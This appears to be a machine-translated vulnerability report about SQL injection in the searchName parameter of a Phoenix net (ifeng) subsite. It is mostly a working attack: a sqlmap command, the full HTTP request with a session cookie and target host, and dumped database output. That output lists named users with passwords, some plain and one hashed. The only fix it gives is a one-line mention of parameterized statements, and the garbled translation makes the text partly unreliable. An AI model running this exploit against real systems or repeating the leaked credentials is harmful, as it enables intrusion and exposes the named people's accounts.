SQL injection vulnerability in a subsite of Phoenix net
Hazard character clearing is not performed correctly for user input
The POST parameter searchName has been injected, and the following HTTP request is saved as SQL _test_10python sqlmap. py-r/root/sqlmap/SQL _test_10 -- time-sec = 2 -- dbms = mysql -- bannerPOST/lvyou/list.html HTTP/1.1Content-Length: 344Content-Type: application/x-www-form-urlencodedCookie: JSESSIONID = 9A1F8F3E628A1B18F3228ECC332E5855Host: app.gz zs. ifeng. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) chrome/28.0.1500.63 Safari/537.36 Accept: */* searchName = * & search_type = 0
Database: gzzsTable: user [6 entries] + ------- + keys + | name | password | + ------- + ---------------------------------- + | System Administrator | administrator | Hu Shuang | Jia | Dai Yaobang | jun | liujy | highlight | Liu Jieyu | yellow | Wang zhongqing | 827ccb0eea8a706c4c34a16891f84e7b | + ------- + ---------------------------------- +
Solution:
Parameterized SQL statement